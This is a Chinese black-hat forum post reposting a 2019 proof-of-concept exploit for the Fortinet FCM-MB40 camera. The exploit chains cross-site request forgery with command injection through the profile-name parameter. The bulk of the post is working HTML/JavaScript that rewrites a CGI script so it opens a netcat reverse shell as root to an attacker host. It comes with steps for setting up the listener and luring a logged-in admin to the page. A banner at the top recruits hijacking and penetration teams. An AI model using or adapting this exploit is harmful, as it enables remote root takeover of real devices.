跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA

<html>
    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 

Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

Follow the following steps to demonstrate this PoC:

1. Replace IP addresses in Javascript code to repr	esent your testing
   environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
   1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
   * Note: all modern browsers will cache Basic Authentication
     credentials (such as those used by the FCM-MB40) even if the
     FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser. 
   * Note: In an attack scenario, this step would be performed by
     implanting the code into a legitimate webpage that the "admin"
     user visits, or by tricking the "admin" user into opening a page
     which includes the code.
5. Note that the `netcat` listener established in step 2. has received
   a connection from the camera, and that it is presenting a `/bin/sh`
   session as root.
   * Note: type `id` in the `netcat` connection to verify this.

_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
    <head>
        <script>
const sleep = (milliseconds) => {
    return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';

var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
    var execute_img = document.createElement("img");
    execute_img.src = execute_url;
});
        </script>
    </head>
    <body>
        <h1>Welcome to my non-malicious website.</h1>
    </body>
</html>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。